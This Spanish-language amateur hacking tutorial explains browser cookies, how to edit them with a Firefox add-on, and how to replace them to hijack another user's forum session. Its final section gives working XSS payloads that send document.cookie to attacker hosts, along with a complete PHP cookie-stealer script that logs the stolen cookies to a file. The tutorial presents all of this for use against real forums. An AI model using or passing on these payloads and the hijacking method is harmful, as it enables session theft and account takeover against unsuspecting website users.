Cookies by: Refused

COOKIES

Introducción:
Bueno, aqui un nuevo papper, en esta ocacion hablaremos sobre las cookies, que muchos no les dan importancia xDD y debido a que vi por ahy gente que preguntaba acerca de estas decidi hacer este papper donde se aprendera que son, como verlas, borrarlas,editarlas, como crear nuevas cookies, reemplazarlas y como robarlas tambien xDD sin mas que decir..

Nota: algunas definiciones fueron extraidas de wikipedia (porque estaba mas entendible xDD)

¿Que son?
Es un fragmento de informacion que se almacena en el disco duro del visitante de una pagina web atraves de su navegador, a petición del servidor de la pagina. Esta información puede
ser luego recuperada por el servidor en posteriores visitas.
Para ver las cookies activas en una pagina, en el campo de direccion escribimos:
javascript:alert(''cookies:''+document.cookie)

Cookies de terceros
Aunque las cookies se envian solo al servidor que las definio o a otro en el mismo dominio, una pagina web puede contener imagenes y otros componentes almacenados en servidores de otros dominios. Las cookies que se crean durante las peticiones de estos componentes se le llaman cookies de terceros.


Editar cookies:
Para poder editar las cookies tenemos un add-on para firefox llamado: AnEC cookie editor, lo malo es que solo es compatible con versiones 3.0.* osea que toco bajarse un firefox de esta version (yo me lo baje portable)

Firefox: http://www.mediafire.com/?jmzudfmg4sx
add-on: https://addons.mozilla.org/es-ES/firefox/addon/573

Con este add-on podemos modificar todo de una cookie y hasta crear nuevas... veamos..
vamos a herramientas>cookie editor y seleecionamos la cookie que queremos editar, click en edit y veremos algo asi: http://img16.imageshack.us/img16/5905/dibujousef.png


Name = nombre de la cookie.
Content = contenido de la cookie.
Domain = dominio de donde se obtubo la cookie.
Path = path donde se usara la cookie dentro del dominio.
Expires = la fecha de expiración de la cookie.

todos estos campos podemos editarlos facilmente con este add-on, la fecha de expiración,etc...


Crear nuevas cookies
Bueno no es mas que darle click al boton ADD del add-on que instalamos y rellenar los campos anteriormente nombrados...

Reemplazar cookies
si conseguimos la cookie de por ejemplo un user de un foro xD simplemente reemplazamos el contenido del campo content por la cookie obtenida o creamos una nueva cookie especificando
el dominio y los demas campos y ya.. xD

¿como robar cookies?
bueno ... aprovechando un XSS... hace un tiempo Xianur0 descubrio un bug en smf donde se insertaba un codigo que robaba las cookies entre unas etiquetas BBCODE que no se filtraba.
si encontramos algo asi podemos usar el siguiente codigo (el mismo que el ejemplo anterior):

javascript:document.write('<FRAMESET><frame name="central" src="http://www.serveratack/CookieStealer.php?cookie<script>'+document.cookie+'</script>"></FRAMESET>')

o

<script>location.href='http://www.yoursite.com/cookiestealer.php?cookie='+escape(document.cookie)</SCRIPT>

o

<script>window.location=’http://atacante.com/xss.php?cookie=’+document.cookie</script>

Lo que hacen estos codigos es enviar por metodo get las cookies del user que accedio al link o lo que sea donde lo allamos metido xDD y las cookies las tendremos en plano en
http://serveratack.com/cookies.txt

Un ejemplo de CookieStealer.php es:
<?php
$cookie = $_GET['cookie'];
$handler = fopen('cookies.txt', 'a');
fwrite($handler, $cookie."\n");
?>

Bueno espero que les halla sido de utilidad el papper
y que ahora tengan aunque sea un concepto basico sobre las cookies